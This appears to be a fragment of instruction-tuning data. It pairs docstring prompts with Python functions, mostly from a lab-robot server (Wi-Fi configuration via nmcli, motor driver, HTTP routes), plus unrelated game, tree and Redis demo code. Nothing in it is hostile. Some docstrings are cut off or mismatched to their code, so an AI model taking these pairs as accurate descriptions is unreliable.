os.environ.get('RESIN_SUPERVISOR_API_KEY', 'unknown') + app_id = os.environ.get('RESIN_APP_ID', 'unknown') + async with aiohttp.ClientSession() as session: + async with session.post(restart_url, + params={'apikey': api}, + json={'appId': app_id, + 'force': True}) as resp: + body = await resp.read() + if resp.status != 202: + log.error("Could not shut down: {}: {}" + .format(resp.status, body)) +[INST] Returns OK, then waits approximately 1 second and restarts container. [/INST] async def restart(request): + do_restart() + return web.json_response({"message": "restarting"}) +[INST] List the visible (broadcasting SSID) wireless networks. +Returns a list of the SSIDs. They may contain spaces and should be escaped +if later passed to a shell.. [/INST] async def available_ssids(): + fields = ['ssid', 'signal', 'active'] + cmd = ['--terse', + '--fields', + ','.join(fields), + 'device', + 'wifi', + 'list'] + out, _ = await _call(cmd) + return _dict_from_terse_tabular( + fields, out, + transformers={'signal': lambda s: int(s) if s.isdigit() else None, + 'active': lambda s: s.lower() == 'yes'}) +[INST] Return the list of configured connections. +This is all connections that nmcli knows about and manages. +Each connection is a dict containing some basic information - the +information retrievable from nmcli connection show. Further information +should be queried on a connection by connection basis. + +If for_type is not None, it should be a str containing an element of +CONNECTION_TYPES, and results will be limited to that connection type.. [/INST] async def connections(for_type=None): + fields = ['name', 'type', 'active'] + res, _ = await _call(['-t', '-f', ','.join(fields), 'connection', 'show']) + found = _dict_from_terse_tabular( + fields, + res, + transformers={'type': lambda s: s.split('-')[-1], + 'active': lambda s: s.lower() == 'yes'} + ) + if for_type is not None: + if for_type not in CONNECTION_TYPES: + raise ValueError('typename {} not in valid connections types {}' + .format(for_type, CONNECTION_TYPES)) + should_return = [] + for c in found: + if c['type'] == for_type: + should_return.append(c) + return should_return + else: + return found +[INST] If there is already a connection for this ssid, return the name of +the connection; if there is not, return None.. [/INST] async def connection_exists(ssid): + nmcli_conns = await connections() + for wifi in [c['name'] + for c in nmcli_conns if c['type'] == 'wireless']: + res, _ = await _call(['-t', '-f', '802-11-wireless.ssid', + '-m', 'tabular', + 'connection', 'show', wifi]) + if res == ssid: + return wifi + return None +[INST] Delete all connections of con_type but the one specified.. [/INST] async def _trim_old_connections(new_name, con_type): + existing_cons = await connections(for_type=con_type) + not_us = [c['name'] for c in existing_cons if c['name'] != new_name] + ok = True + res = [] + for c in not_us: + this_ok, remove_res = await remove(name=c) + ok = ok and this_ok + if not this_ok: + log.warning("Could not remove wifi connection {}: {}" + .format(c, remove_res)) + res.append(remove_res) + else: + log.debug("Removed old wifi connection {}".format(c)) + return ok, ';'.join(res) +[INST] Configure a connection but do not bring it up (though it is configured +for autoconnect). + + + +Only anticipated failures are treated that way - for instance, an ssid +that doesn't exist will get a False and a message; a system where nmcli +is not found will raise a CalledProcessError. + +The ssid is mandatory. If security_type is 'wpa-psk', the psk must be +specified; if security_type is 'none', the psk will be ignored. + +If security_type is not specified, it will be inferred from the specified +arguments.. [/INST] async def configure(ssid, + security_type=None, + psk=None, + hidden=False, + up_retries=3): + if None is security_type and None is not psk: + security_type = 'wpa-psk' + if security_type and security_type not in SUPPORTED_SECURITY_TYPES: + message = 'Only security types {} are supported'\ + .format(SUPPORTED_SECURITY_TYPES) + log.error("Specified security type <{}> is not supported" + .format(security_type)) + return False, message + already = await connection_exists(ssid) + if already: + _1, _2 = await _call(['connection', 'delete', already]) + configure_cmd = ['connection', 'add', + 'save', 'yes', + 'autoconnect', 'yes', + 'ifname', 'wlan0', + 'type', 'wifi', + 'con-name', ssid, + 'wifi.ssid', ssid] + if security_type: + configure_cmd += ['wifi-sec.key-mgmt', security_type] + if psk: + configure_cmd += ['wifi-sec.psk', psk] + if hidden: + configure_cmd += ['wifi.hidden', 'true'] + res, err = await _call(configure_cmd) + uuid_matches = re.search( + "Connection '(.*)'[\s]+\(([\w\d-]+)\) successfully", res) + if not uuid_matches: + return False, err.split('\r')[-1] + name = uuid_matches.group(1) + uuid = uuid_matches.group(2) + for _ in range(up_retries): + res, err = await _call(['connection', 'up', 'uuid', uuid]) + if 'Connection successfully activated' in res: + _1, _2 = await _trim_old_connections(name, 'wireless') + return True, res + else: + return False, err.split('\r')[-1] +[INST] Remove a network. Depending on what is known, specify either ssid +(in which case this function will call ``connection_exists`` to get the +nmcli connection name) or the nmcli connection name directly. + +Returns (True, msg) if the connection was deleted, (False, msg) otherwise.. [/INST] async def remove(ssid=None, name=None) -> (bool, str): + if None is not ssid: + name = await connection_exists(ssid) + if None is not name: + res, err = await _call(['connection', 'delete', name]) + if 'successfully deleted' in res: + return True, res + else: + return False, err + else: + return False, 'No connection for ssid {}'.format(ssid) +[INST] Get the basic network configuration of an interface. + +which_iface should be a string in IFACE_NAMES.. [/INST] async def iface_info(which_iface): + if which_iface not in IFACE_NAMES: + raise ValueError('Bad interface name {}, not in {}' + .format(which_iface, IFACE_NAMES)) + default_res = {'ipAddress': None, + 'macAddress': None, + 'gatewayAddress': None} + fields = ['GENERAL.HWADDR', 'IP4.ADDRESS', 'IP4.GATEWAY', 'GENERAL.STATE'] + res, err = await _call(['--mode', 'tabular', + '--escape', 'no', + '--terse', '--fields', ','.join(fields), + 'dev', 'show', which_iface]) + values = res.split('\n') + if len(fields) != len(values): + raise ValueError("Bad result from nmcli: {}".format(err)) + default_res['macAddress'] = values[0] + default_res['ipAddress'] = values[1] + default_res['gatewayAddress'] = values[2] + return default_res +[INST] Runs the command in a subprocess and returns the captured stdout output.. [/INST] async def _call(cmd) -> (str, str): + to_exec = [quote(c) for c in ['nmcli'] + cmd] + cmd_str = ' '.join(to_exec) + proc = await as_subprocess.create_subprocess_shell( + cmd_str, + stdout=as_subprocess.PIPE, stderr=as_subprocess.PIPE) + out, err = await proc.communicate() + out_str, err_str = out.decode().strip(), err.decode().strip() + sanitized = sanitize_args(to_exec) + log.debug('{}: stdout={}'.format(' '.join(sanitized), out_str)) + if err_str: + log.info('{}: stderr={}'.format(' '.join(sanitized), err_str)) + return out_str, err_str +[INST] Filter the command so that it no longer contains passwords. [/INST] def sanitize_args(cmd) -> (str, str): + sanitized = [] + for idx, fieldname in enumerate(cmd): + if idx > 0 and 'wifi-sec.psk' in cmd[idx-1]: + sanitized.append('****') + else: + sanitized.append(fieldname) + return sanitized +[INST] Parse NMCLI terse tabular output into a list of Python dict. +``names`` is a list of strings of field names to apply to the input data, +which is assumed to be colon separated. + +``inp`` is the input as a string d) from nmcli + +``transformers`` is a dict mapping field names to callables of the form +f: str -> any. If a fieldname is in transformers, that callable will be +invoked on the field matching the name and the result stored. + +The return value is a list with one element per valid line of input, where +each element is a dict with keys taken from names and values from the input. [/INST] def _dict_from_terse_tabular(names, inp, transformers={}): + res = [] + for n in names: + if n not in transformers: + transformers[n] = lambda s: s + for line in inp.split('\n'): + if len(line) < 3: + continue + fields = line.split(':') + res.append(dict([ + (elem[0], transformers[elem[0]](elem[1])) + for elem in zip(names, fields)])) + return res +[INST] Unmount and remove the sqlite database (used in robot reset). [/INST] def reset(): + if os.path.exists(database_path): + os.remove(database_path) + journal_path = database_path + '-journal' + if os.path.exists(journal_path): + os.remove(journal_path) +[INST] Get request will return a list of discovered ssids.. [/INST] async def list_networks(request): + res = {"list": []} + try: + networks = await nmcli.available_ssids() + except subprocess.CalledProcessError as e: + res = "CalledProcessError: {}".format(e.stdout) + status = 500 + except FileNotFoundError as e: + res = "FileNotFoundError: {}".format(e) + status = 500 + else: + res["list"] = networks + status = 200 + return web.json_response(res, status=status) +[INST] Post request should include a json body specifying config information +. Robot will attempt to connect to this network and respond +with Ok if successful or an error code if not. + +Fields in the body are: +ssid: str Required. The SSID to connect to.. [/INST] async def configure(request): + result = {} + try: + body = await request.json() + ssid = body.get('ssid') + psk = body.get('psk') + hidden = body.get('hidden') + security = body.get('security_type') + if ssid is None: + status = 400 + message = 'Error: "ssid" string is required' + else: + ok, message = await nmcli.configure(ssid, + security_type=security, + psk=psk, + hidden=hidden) + status = 201 if ok else 401 + result['ssid'] = ssid + except json.JSONDecodeError as e: + log.debug("Error: JSONDecodeError in /wifi/configure: {}".format(e)) + status = 400 + message = e.msg + except Exception as e: + log.warning("Error: {} in /wifi/configure': {}".format(type(e), e)) + status = 500 + message = 'An unexpected error occurred.' + result['message'] = message + log.debug("Wifi configure result: {}".format(result)) + return web.json_response(data=result, status=status) +[INST] Get request will return the status of the wifi connection from the +RaspberryPi to the internet. + +The body of the response is a json dict containing. [/INST] async def status(request): + connectivity = {'status': 'none', + 'ipAddress': None, + 'macAddress': 'unknown', + 'gatewayAddress': None} + try: + connectivity['status'] = await nmcli.is_connected() + net_info = await nmcli.iface_info('wlan0') + connectivity.update(net_info) + log.debug("Connectivity: {}".format(connectivity['status'])) + status = 200 + except subprocess.CalledProcessError as e: + log.error("CalledProcessError: {}".format(e.stdout)) + status = 500 + except FileNotFoundError as e: + log.error("FileNotFoundError: {}".format(e)) + status = 500 + return web.json_response(connectivity, status=status) +[INST] Avahi Server Version Check, return avahi version string, eg.. [/INST] def GetVersion(self): + try: + return self.server.GetVersionString() + except dbus.DBusException: + return None +[INST] Return hostname according to the Avahi server. [/INST] def GetHostName(self): + try: + return self.server.GetHostName() + except dbus.DBusException: + return None +[INST] Return hostname according to the Avahi server. [/INST] def GetDomainName(self): + try: + return self.server.GetDomainName() + except dbus.DBusException: + return None +[INST] Return a new entry group for services. [/INST] def EntryGroupNew(self): + try: + return self.server.EntryGroupNew() + except dbus.DBusException: + return None +[INST] Execute a reset of the requested parts of the user configuration.. [/INST] async def reset(request: web.Request) -> web.Response: + data = await request.json() + for requested_reset in data.keys(): + if requested_reset not in [opt['id'] + for opt in _settings_reset_options]: + log.error('Bad reset option {} requested'.format(requested_reset)) + return web.json_response( + {'message': '{} is not a valid reset option' + .format(requested_reset)}, + status=400) + log.info("Reset requested for {}".format(', '.join(data.keys()))) + if data.get('deckCalibration'): + rc.clear(calibration=True, robot=False) + if data.get('tipProbe'): + config = rc.load() + config.tip_length.clear() + rc.save_robot_settings(config) + if data.get('labwareCalibration'): + db.reset() + if data.get('bootScripts'): + if os.environ.get('RUNNING_ON_PI'): + if os.path.exists('/data/boot.d'): + shutil.rmtree('/data/boot.d') + else: + log.debug('Not on pi, not removing /data/boot.d') + return web.json_response({}, status=200) +[INST] Moves the robot to the specified position as provided by the `control.info` +endpoint response. [/INST] async def move(request): + req = await request.text() + data = json.loads(req) + target, point, mount, model, message, error = _validate_move_data(data) + if error: + status = 400 + else: + status = 200 + if target == 'mount': + message = _move_mount(mount, point) + elif target == 'pipette': + pipette, _ = _fetch_or_create_pipette(mount, model) + pipette.move_to((robot.deck, point), strategy='arc') + new_position = tuple( + pose_tracker.absolute(pipette.robot.poses, pipette)) + message = "Move complete. New position: {}".format(new_position) + return web.json_response({"message": message}, status=status) +[INST] This initializes a call to pipette.home() which, as a side effect will: +1. Check the pipette is actually connected (will throw an error if you +try to home a non-connected pipette) +2. Re-engages the motor. [/INST] async def home(request): + req = await request.text() + data = json.loads(req) + target = data.get('target') + if target in ['robot', 'pipette']: + if target == 'robot': + robot.home() + status = 200 + message = "Homing robot." + else: + mount = data.get('mount') + if mount in ['left', 'right']: + pipette, should_remove = _fetch_or_create_pipette(mount) + pipette.home() + if should_remove: + robot.remove_instrument(mount) + status = 200 + message = "Pipette on {} homed successfully.".format(mount) + else: + status = 400 + message = "Expected 'left' or 'right' as values for mount" \ + "got {} instead.".format(mount) + else: + status = 400 + message = "Expected 'robot' or 'pipette' got {}.".format(target) + return web.json_response({"message": message}, status=status) +[INST] Reads in an attached pipette's UUID +The UUID is unique to this pipette, and is a string of unknown length + +String (str) with value 'left' or 'right'. [/INST] def read_pipette_id(self, mount): + if self.simulating: + res = '1234567890' + else: + res = self._read_from_pipette(GCODES['READ_INSTRUMENT_ID'], mount) + if res: + ret = {'pipette_id': res} + else: + ret = {'message': 'Error: Pipette ID read failed'} + return ret +[INST] Reads an attached pipette's MODEL +The MODEL is a unique string for this model of pipette + +:return model string, or None. [/INST] def read_pipette_model(self, mount): + if self.simulating: + res = None + else: + res = self._read_from_pipette( + GCODES['READ_INSTRUMENT_MODEL'], mount) + if res and '_v' not in res: + res = res + '_v1' + elif res and '_v13' in res: + res = res.replace('_v13', '_v1.3') + return res +[INST] Submit a GCODE command to the robot, followed by M400 to block until +done. This method also ensures that any command on the B or C axis +(the axis for plunger control) do current ramp-up and ramp-down, so +that plunger motors rest at a low current to prevent burn-out. + +In the case of a limit-switch alarm during any command other than home, +the robot should home the axis from the alarm and then raise a +SmoothieError. The robot should *not* recover and continue to run the +protocol, as this could result in unpredicable handling of liquids. +When a SmoothieError is raised, the user should inspect the physical +configuration of the robot and the protocol and determine why the limit +switch was hit unexpectedly. This is usually due to an undetected +collision in a previous move command.. [/INST] def _send_command(self, command, timeout=DEFAULT_SMOOTHIE_TIMEOUT): + if self.simulating: + return + command_line = command + ' ' + SMOOTHIE_COMMAND_TERMINATOR + ret_code = self._recursive_write_and_return( + command_line, timeout, DEFAULT_COMMAND_RETRIES) + ret_code = self._remove_unwanted_characters(command_line, ret_code) + if (ERROR_KEYWORD in ret_code.lower()) or \ + (ALARM_KEYWORD in ret_code.lower()): + self._reset_from_error() + error_axis = ret_code.strip()[-1] + if GCODES['HOME'] not in command and error_axis in 'XYZABC': + self.home(error_axis) + raise SmoothieError(ret_code) + return ret_code.strip() +[INST] Read from an attached pipette's internal memory. The gcode used +determines which portion of memory is read and returned. + +All motors must be disengaged to consistently read over I2C lines. [/INST] def _read_from_pipette(self, gcode, mount): + allowed_mounts = {'left': 'L', 'right': 'R'} + mount = allowed_mounts.get(mount) + if not mount: + raise ValueError('Unexpected mount: {}'.format(mount)) + try: + self.disengage_axis('BC') + self.delay(CURRENT_CHANGE_DELAY) + res = self._send_command(gcode + mount) + if res: + res = _parse_instrument_data(res) + assert mount in res + return _byte_array_to_ascii_string(res[mount]) + except (ParseError, AssertionError, SmoothieError): + pass +[INST] Move to the `target` Smoothieware coordinate, along any of the size +axes, XYZABC. + +dict +dict setting the coordinate that Smoothieware will be at when +`move()` returns. `target` keys are the axis in upper-case, and the +values are the coordinate in millimeters (float) + +boolean (default=False) +If set to `True`, each axis included within the target coordinate +may be homed before moving, determined by Smoothieware's internal +homing-status flags (`True` means it has already homed). All axes' +flags are set to `False` by Smoothieware under three conditions: +1) Smoothieware boots or resets, 2) if a HALT gcode or signal +is sent, or 3) a homing/limitswitch error occured.. [/INST] def move(self, target, home_flagged_axes=False): + from numpy import isclose + self.run_flag.wait() + def valid_movement(coords, axis): + return not ( + (axis in DISABLE_AXES) or + (coords is None) or + isclose(coords, self.position[axis]) + ) + def create_coords_list(coords_dict): + return [ + axis + str(round(coords, GCODE_ROUNDING_PRECISION)) + for axis, coords in sorted(coords_dict.items()) + if valid_movement(coords, axis) + ] + backlash_target = target.copy() + backlash_target.update({ + axis: value + PLUNGER_BACKLASH_MM + for axis, value in sorted(target.items()) + if axis in 'BC' and self.position[axis] < value + }) + target_coords = create_coords_list(target) + backlash_coords = create_coords_list(backlash_target) + if target_coords: + non_moving_axes = ''.join([ + ax + for ax in AXES + if ax not in target.keys() + ]) + self.dwell_axes(non_moving_axes) + self.activate_axes(target.keys()) + command = self._generate_current_command() + if backlash_coords != target_coords: + command += ' ' + GCODES['MOVE'] + ''.join(backlash_coords) + command += ' ' + GCODES['MOVE'] + ''.join(target_coords) + try: + for axis in target.keys(): + self.engaged_axes[axis] = True + if home_flagged_axes: + self.home_flagged_axes(''.join(list(target.keys()))) + log.debug("move: {}".format(command)) + self._send_command(command, timeout=DEFAULT_MOVEMENT_TIMEOUT) + finally: + plunger_axis_moved = ''.join(set('BC') & set(target.keys())) + if plunger_axis_moved: + self.dwell_axes(plunger_axis_moved) + self._set_saved_current() + self._update_position(target) +[INST] In order to terminate Smoothie motion immediately (including +interrupting a command in progress, we set the reset pin low and then +back to high, then call `_setup` method to send the RESET_FROM_ERROR +Smoothie code to return Smoothie to a normal waiting state and reset +any other state needed for the driver.. [/INST] def kill(self): + log.debug("kill") + self._smoothie_hard_halt() + self._reset_from_error() + self._setup() +[INST] Function that sets log levels and format strings. Checks for the +OT_LOG_LEVEL environment variable otherwise defaults to DEBUG.. [/INST] def log_init(): + fallback_log_level = 'INFO' + ot_log_level = robot.config.log_level + if ot_log_level not in logging._nameToLevel: + log.info("OT Log Level {} not found. Defaulting to {}".format( + ot_log_level, fallback_log_level)) + ot_log_level = fallback_log_level + level_value = logging._nameToLevel[ot_log_level] + serial_log_filename = environment.get_path('SERIAL_LOG_FILE') + api_log_filename = environment.get_path('LOG_FILE') + logging_config = dict( + version=1, + formatters={ + 'basic': { + 'format': + '%(asctime)s %(name)s %(levelname)s [Line %(lineno)s] %(message)s' + } + }, + handlers={ + 'debug': { + 'class': 'logging.StreamHandler', + 'formatter': 'basic', + 'level': level_value + }, + 'serial': { + 'class': 'logging.handlers.RotatingFileHandler', + 'formatter': 'basic', + 'filename': serial_log_filename, + 'maxBytes': 5000000, + 'level': logging.DEBUG, + 'backupCount': 3 + }, + 'api': { + 'class': 'logging.handlers.RotatingFileHandler', + 'formatter': 'basic', + 'filename': api_log_filename, + 'maxBytes': 1000000, + 'level': logging.DEBUG, + 'backupCount': 5 + } + }, + loggers={ + '__main__': { + 'handlers': ['debug', 'api'], + 'level': logging.INFO + }, + 'opentrons.server': { + 'handlers': ['debug', 'api'], + 'level': level_value + }, + 'opentrons.api': { + 'handlers': ['debug', 'api'], + 'level': level_value + }, + 'opentrons.instruments': { + 'handlers': ['debug', 'api'], + 'level': level_value + }, + 'opentrons.robot.robot_configs': { + 'handlers': ['debug', 'api'], + 'level': level_value + }, + 'opentrons.drivers.smoothie_drivers.driver_3_0': { + 'handlers': ['debug', 'api'], + 'level': level_value + }, + 'opentrons.drivers.serial_communication': { + 'handlers': ['serial'], + 'level': logging.DEBUG + }, + 'opentrons.system': { + 'handlers': ['debug', 'api'], + 'level': level_value + } + } + ) + dictConfig(logging_config) +[INST] Builds an application including the RPC server, and also configures HTTP +routes for methods defined in opentrons.server.endpoints. [/INST] def init(loop=None): + server = Server(MainRouter(), loop=loop, middlewares=[error_middleware]) + server.app.router.add_get( + '/health', endp.health) + server.app.router.add_get( + '/wifi/list', wifi.list_networks) + server.app.router.add_post( + '/wifi/configure', wifi.configure) + server.app.router.add_get( + '/wifi/status', wifi.status) + server.app.router.add_post( + '/identify', control.identify) + server.app.router.add_get( + '/modules', control.get_attached_modules) + server.app.router.add_get( + '/modules/{serial}/data', control.get_module_data) + server.app.router.add_post( + '/camera/picture', control.take_picture) + server.app.router.add_post( + '/server/update', endpoints.update_api) + server.app.router.add_post( + '/server/update/firmware', endpoints.update_firmware) + server.app.router.add_get( + '/server/update/ignore', endpoints.get_ignore_version) + server.app.router.add_post( + '/server/update/ignore', endpoints.set_ignore_version) + server.app.router.add_static( + '/logs', log_file_path, show_index=True) + server.app.router.add_post( + '/server/restart', endpoints.restart) + server.app.router.add_post( + '/calibration/deck/start', dc_endp.start) + server.app.router.add_post( + '/calibration/deck', dc_endp.dispatch) + server.app.router.add_get( + '/pipettes', control.get_attached_pipettes) + server.app.router.add_get( + '/motors/engaged', control.get_engaged_axes) + server.app.router.add_post( + '/motors/disengage', control.disengage_axes) + server.app.router.add_get( + '/robot/positions', control.position_info) + server.app.router.add_post( + '/robot/move', control.move) + server.app.router.add_post( + '/robot/home', control.home) + server.app.router.add_get( + '/robot/lights', control.get_rail_lights) + server.app.router.add_post( + '/robot/lights', control.set_rail_lights) + server.app.router.add_get( + '/settings', settings.get_advanced_settings) + server.app.router.add_post( + '/settings', settings.set_advanced_setting) + server.app.router.add_post( + '/settings/reset', settings.reset) + server.app.router.add_get( + '/settings/reset/options', settings.available_resets) + return server.app +[INST] This application creates and starts the server for both the RPC routes +handled by opentrons.server.rpc and HTTP endpoints defined here. [/INST] def main(): + log_init() + arg_parser = ArgumentParser( + description="Opentrons application server", + prog="opentrons.server.main" + ) + arg_parser.add_argument( + "-H", "--hostname", + help="TCP/IP hostname to serve on (default: %(default)r)", + default="localhost" + ) + arg_parser.add_argument( + "-P", "--port", + help="TCP/IP port to serve on (default: %(default)r)", + type=int, + default="8080" + ) + arg_parser.add_argument( + "-U", "--path", + help="Unix file system path to serve on. Specifying a path will cause " + "hostname and port arguments to be ignored.", + ) + args, _ = arg_parser.parse_known_args(sys.argv[1:]) + if args.path: + log.debug("Starting Opentrons server application on {}".format( + args.path)) + else: + log.debug("Starting Opentrons server application on {}:{}".format( + args.hostname, args.port)) + try: + robot.connect() + except Exception as e: + log.exception("Error while connecting to motor-driver: {}".format(e)) + log.info("API server version: {}".format(__version__)) + log.info("Smoothie FW version: {}".format(robot.fw_version)) + if not ff.disable_home_on_boot(): + log.info("Homing Z axes") + robot.home_z() + if not os.environ.get("ENABLE_VIRTUAL_SMOOTHIE"): + setup_udev_rules_file() + unlock_resin_updates() + web.run_app(init(), host=args.hostname, port=args.port, path=args.path) + arg_parser.exit(message="Stopped\n") +[INST] Build a fake minor package and return its path. [/INST] def build_pkg(package_name, version, in_dir=None): + if not in_dir: + td = tempfile.mkdtemp() + in_dir = os.path.join(td, package_name) + os.mkdir(in_dir) + test_setup = """ +from setuptools import setup +setup(name='{0}', +version='{1}', +description='Test package', +url='http://github.com/Opentrons/opentrons', +author='Opentrons', +author_email='test@example.com', +license='Apache 2.0', +packages=['{0}'], +zip_safe=False) +""".format(package_name, version) + test_setup_file = os.path.join(in_dir, 'setup.py') + with open(test_setup_file, 'w') as tsf: + tsf.write(test_setup) + src_dir = os.path.join(in_dir, package_name) + try: + os.mkdir(src_dir) + except FileExistsError: + pass + test_code = """ +print("all ok")' +""" + test_file = os.path.join(src_dir, '__init__.py') + with open(test_file, 'w') as tf: + tf.write(test_code) + cmd = '{} setup.py bdist_wheel'.format(sys.executable) + subprocess.run(cmd, cwd=in_dir, shell=True) + return os.path.join( + in_dir, 'dist', + '{}-{}-py3-none-any.whl'.format(package_name, version)) +[INST] Calculate axis position for a given liquid volume. +Translates the passed liquid volume to absolute coordinates +on the axis associated with this pipette. + +Calibration of the pipette motor's ul-to-mm conversion is required. [/INST] def _aspirate_plunger_position(self, ul): + model = self.name + if self.ul_per_mm: + ul_per_mm = lambda: self.ul_per_mm + else: + ul_per_mm = self._key_map_pipette_functions(model, ul, 'aspirate') + millimeters = ul / ul_per_mm() + destination_mm = self._get_plunger_position('bottom') + millimeters + return round(destination_mm, 6) +[INST] Calculate axis position for a given liquid volume. +Translates the passed liquid volume to absolute coordinates +on the axis associated with this pipette. + +Calibration of the pipette motor's ul-to-mm conversion is required. [/INST] def _dispense_plunger_position(self, ul): + model = self.name + if self.ul_per_mm: + ul_per_mm = lambda: self.ul_per_mm + else: + ul_per_mm = self._key_map_pipette_functions(model, ul, 'dispense') + millimeters = ul / ul_per_mm() + destination_mm = self._get_plunger_position('bottom') + millimeters + return round(destination_mm, 6) +[INST] Returns the plunger percentage for a given volume. +We use this to calculate what actual position the plunger axis +needs to be at in order to achieve the correct volume of liquid.. [/INST] def _volume_percentage(self, volume): + if volume < 0: + raise RuntimeError( + "Volume must be a positive number, got {}.".format(volume)) + if volume > self.max_volume: + raise RuntimeError( + "{0}µl exceeds pipette's maximum volume ({1}ul).".format( + volume, self.max_volume)) + if volume < self.min_volume: + self.robot.add_warning( + "{0}µl is less than pipette's min_volume ({1}ul).".format( + volume, self.min_volume)) + return volume / self.max_volume +[INST] Draw a card depending how many it will be drawn.. [/INST] def draw_card(deck, draw_number): + draw_copy = deck[0:draw_number] + del deck[0:draw_number] + return draw_copy +[INST] Find the card in the player's hand.. [/INST] def find_card(hand, card): + try: + if hand.index(card): + return True + except ValueError: + return False +[INST] Discard the card into play.. [/INST] def play_card(hand, card_index, discard_pile): + copied_card = hand[card_index] + if not discard_pile: + del hand[card_index] + discard_pile.append(copied_card) + elif card_compare(hand[card_index], discard_pile[-1]): + del hand[card_index] + discard_pile.append(copied_card) +[INST] Do an action depending on the top of the discard pile.. [/INST] def do_action(hand, deck, discard_pile): + top_discard_card = discard_pile[-1] + if top_discard_card == "wild-draw-4": + print("\nThe draw 4 wildcard has been played. The game will automatically draw 4 cards for you.\n") + new_4_cards = ' '.join(deck[0:4]) + hand += draw_card(deck, 4) + print("The new cards are:", new_4_cards + "\n") + elif top_discard_card.endswith("draw-2"): + top_discard_card_color = top_discard_card.split("-")[0] + print("\nThe draw 2 card from the color", top_discard_card_color, "has been played. The game will \ +automatically draw 2 cards for you.\n") + new_2_cards = ' '.join(deck[0:2]) + hand += draw_card(deck, 2) + print("The news cards are", new_2_cards + "\n") +[INST] Refill deck from the discard pile if it runs out.. [/INST] def refill_deck(deck, discard_pile): + if deck: + return + else: + deck += random.sample(discard_pile.copy(), len(discard_pile)) + discard_pile.clear() +[INST] \ +This is the main function of the program. + +This function will be called immediately at start of execution.. [/INST] def main(): + my_deck = make_deck() + players_hands = { + "User": [] + } + players_hands["Computer"] = [] + players_names = list(players_hands.keys()) + discard_pile = [] + for player in players_hands.keys(): + players_hands[player] = draw_card(my_deck, 7) + beginning = True + game_over = False + while not game_over: + for player in players_names: + refill_deck(my_deck, discard_pile) + curr_player_hand = players_hands[player] + print("It is", player + "'s", "turn\n") + if player == "User": + draw_limit = 1 + if beginning: + print("Drop a card to the discard pile to start.") + else: + print("Pick the right card to drop to the discard pile.") + if discard_pile: + print("Current play:", discard_pile[-1]) + for card in enumerate(curr_player_hand, start=1): + print(str(card[0]) + ":", card[1]) + repeat_process = True + while repeat_process: + print("Number of cards in deck:", len(my_deck)) + try: + selected_card = int(input("Select card (0 to draw, -1 to check hand and -2 to end turn): ")) + except ValueError: + continue + if selected_card <= len(curr_player_hand) and selected_card >= 1: + if not discard_pile or card_compare(curr_player_hand[selected_card-1], discard_pile[-1]): + play_card(curr_player_hand, selected_card-1, discard_pile) + do_action(curr_player_hand, my_deck, discard_pile) + print(player + "'s turn has ended.\n") + repeat_process = False + else: + print("Wrong card, try again\n") + elif selected_card == 0: + if draw_limit > 0: + curr_player_hand += draw_card(my_deck, 1) + print("New card has been added to your hand ({})\n".format(curr_player_hand[-1])) + draw_limit -= 1 + continue + else: + print("You can't draw anymore until your next turn!\n") + elif selected_card == -1: + print("It is", player + "'s turn") + if discard_pile: + print("Current play:", discard_pile[-1]) + for card in enumerate(curr_player_hand, start=1): + print(str(card[0]) + ":", card[1]) + continue + elif selected_card == -2: + print("\n" + player + "'s turn has ended\n") + repeat_process = False + else: + print("\nPlease pick a number that is shown at the screen.\n") + continue + else: + ai(player, curr_player_hand, my_deck, discard_pile) + if is_winner(player, curr_player_hand): + print(player, "has won the game!") + game_over = True + break +[INST] Update the i-th node value to x.. [/INST] def update(self, i, x): + i += self.N - 1 + self.node[i] = x + while i > 1: + i >>= 1 + self.node[i] = self.func(self.node[i << 1], self.node[i << 1 | 1]) +[INST] Compute semi-orthogonality error (for debugging purposes).. [/INST] def orth_error(self): + orth_error = 0 + for layer in [self.factor1, self.factor2]: + orth_error += layer.orth_error() + return orth_error +[INST] Check whether the context is symmetrical and whether the passed +context can be used for creating a convolution kernel with dil. [/INST] def check_valid_context(context: list) -> None: + assert len(context) == 2 or len(context) % 2 != 0, "Context length must be 2 or odd" + if len(context) == 2: + assert context[0] + context[1] == 0, "Context must be of type {-1, 1}" + else: + assert context[len(context) // 2] == 0, "The context contain 0 in the center" + if len(context) > 1: + delta = [context[i] - context[i - 1] for i in range(1, len(context))] + assert all(delta[0] == delta[i] for i in range(1, len(delta))), \ + "Intra context spacing must be equal!" +[INST] Check if all the dependencies required by this application are installed. [/INST] def check_app_dependencies(self, deps): + if not deps: + return True + for dep in [x.strip() for x in deps.split(',') if x != ""]: + try: + app = ONOSApp.objects.get(app_id=dep) + if not app.backend_code == 1: + return False + except IndexError: + return False + return True +[INST] Never acquire a ServiceInstance on the ONOS Service, +those are ONOS apps, simply return true. [/INST] def acquire_service_instance(self, subscriber_service_instance): + return True +[INST] In the case of the ONOS service there are no links between ServiceInstances and ONOSApps, +so alway return an empty list. [/INST] def validate_links(self, subscriber_service_instance): + return [] +[INST] A quick and dirty way to reset Redis for the demo.. [/INST] def reset_app(): + r_client = RedisConn().get_client() + current_keys = r_client.keys("*") + for key in current_keys: + r_client.delete(key) + return True +[INST] Keyword arguments: +bf -- the bloom filter +pw -- the password to add + +boolean indicating success + +AssertionError on None value args. [/INST] def add_password_bloom_filter(bf, pw): + return str(add_to_bloom_filter_format_result(bf, pw)) +[INST] Checks a list of grandma's passwords to see how many of her passwords were unique. +Keyword Arguments: +passwords -- a list of passwords +percent_error -- the error rate (default to .2 or 20%). [/INST] def check_passwords(passwords=GRANDMA_PASSWORDS, error_rate=.2): + r_client = RedisConn().get_client() + grandma_bloom_filter = "gbloom" + grandma_set = "gset" + r_client.delete(grandma_bloom_filter) + r_client.delete(grandma_set) + r_client.bf().create(grandma_bloom_filter, error_rate, 50) + set_unique_count = 0 + bf_unique_count = 0 + check_results = list() + for password in passwords: + unique_to_bf = is_unique_bloom_filter(grandma_bloom_filter, password) + add_bloom_filter(grandma_bloom_filter, password) + if unique_to_bf: + bf_unique_count += 1 + unique_to_set = is_unique_set(grandma_set, password) + add_set(grandma_set, password) + if unique_to_set: + set_unique_count += 1 + password_results = RESULTS(password, unique_to_bf, unique_to_set, bf_unique_count, set_unique_count) + check_results.append(str(password_results)) + return { + "unique_count_set": set_unique_count, + "unique_count_bf": bf_unique_count, + "total_count": len(passwords), + "check_results": check_results + } +[INST] Adds items to specified set and formats return as boolean. +Keyword arguments: +set_name -- the set name +item -- the item to add + +Boolean indicating success + +AssertionError on None value args. [/INST] def add_to_set_format_result(set_name, item): + result = add_set(set_name, item) + return result == ITEM_ADDED_SUCCESSFULLY_SET +[INST] Converts Redis results to boolean representing if item was unique (aka not found). +Keyword arguments: +set_name -- the set +item -- the item to check. 